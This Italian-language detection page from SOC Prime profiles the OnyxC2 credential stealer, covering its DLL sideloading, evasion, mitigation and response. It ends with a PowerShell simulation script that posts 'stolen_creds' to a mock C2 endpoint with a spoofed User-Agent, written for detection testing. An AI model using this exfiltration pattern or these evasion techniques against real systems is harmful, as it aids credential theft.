SOC Prime Bias: Alto

16 Jun 2026 12:54 UTC

OnyxC2: Un nuovo Stealer che mira a 210 applicazioni

Author Photo
SOC Prime Team linkedin icon Segui
OnyxC2: Un nuovo Stealer che mira a 210 applicazioni
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

OnyxC2 è un nuovo malware-as-a-service stealer progettato per colpire credenziali, estensioni di autenticazione a due fattori e portafogli di criptovalute in circa 210 applicazioni. La piattaforma offre un toolkit completo in stile commerciale, inclusi un pannello di gestione, un builder e funzionalità di accesso remoto. Si basa anche su metodi di evasione avanzati, tra cui il sideloading di DLL con binari firmati di grandi dimensioni e componenti di payload crittografati.

Indagine

I ricercatori di BlackFog hanno esaminato più campioni di OnyxC2 e hanno scoperto un metodo di sideloading di DLL che sfrutta un eseguibile host firmato insieme a una DLL dannosa di oltre 120 MB mascherata come una libreria grafica NVIDIA. L’analisi della rete ha mostrato il malware comunicare tramite HTTPS con un endpoint API di backend specifico. I ricercatori hanno anche trovato overlay crittografati incorporati nella DLL, aiutando il malware a evitare un’analisi statica diretta.

Mitigazione

Implementare controlli di anti-esfiltrazione dei dati al punto finale può aiutare a bloccare il traffico in uscita non autorizzato indipendentemente dal processo utilizzato. I team di sicurezza dovrebbero monitorare i caricamenti sospetti di DLL associati a binari firmati e indagare su file insolitamente grandi che compaiono nei percorsi scrivibili dagli utenti. Sono anche raccomandate politiche di controllo applicativo rigorose e il monitoraggio di attività programmate non autorizzate.

Risposta

Se viene rilevata attività di OnyxC2, isolare immediatamente il sistema colpito per fermare ulteriori furti di dati. Catturare un dump completo della memoria per recuperare il payload decrittografato e verificare la presenza di sessioni HVNC attive o attività proxy SOCKS5. Rivedere tutte le attività programmate create di recente e ispezionare gli archivi delle credenziali del browser per evidenze di compromissione.

Flusso di attacco

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.

Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e puntare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa di Attacco e Comandi: L’avversario cerca di esfiltrare credenziali del browser rubate. Per evitare il rilevamento da parte del monitoraggio della sicurezza di rete, distribuiscono un binario Tor portatile per creare un tunnel anonimizzato. Una volta stabilito il tunnel, il malware avvia una connessione al suo server di Comando e Controllo (C2). Per mimetizzarsi con il traffico web legittimo, il malware finge il suo User-Agent per apparire come “Cloudflare” e prende di mira un endpoint API specifico ospitato dietro un proxy Cloudflare. Questa sequenza è progettata per attivare la correlazione della regola di rilevamento tor argomenti da riga di comando e la specifica /backend/api/app.php modello URL.

  • Script di Test di Regressione:

    # Simulazione della Comunicazione OnyxC2 Stealer
    
    # 1. Simulare la presenza di Tor (Creando un file/processo fittizio)
    # In uno scenario reale, sarebbe il vero tor.exe
    $TorPath = "$env:TEMPtor.exe"
    "Contenuto Simulato del Binario Tor" | Out-File -FilePath $TorPath
    
    # Creare un evento di esecuzione processo per 'tor' attraverso la riga di comando
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden
    
    # Per assicurarsi che la logica di rilevamento 'command_line|contains: tor' venga colpita, 
    # eseguiamo un comando che include la stringa 'tor'
    cmd.exe /c "echo initializing tor proxy..."
    
    # 2. Simulare la Connessione di Rete C2
    # Usiamo PowerShell per simulare una connessione di rete con l'URL specifico e User-Agent
    $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php"
    $UserAgent = "Cloudflare-Proxy-Agent/1.0"
    
    Write-Host "Attempting C2 communication to $C2Url"
    Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue
  • Comandi di Pulizia:

    # Rimuovere gli artefatti simulati
    Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "Pulizia simulazione completata."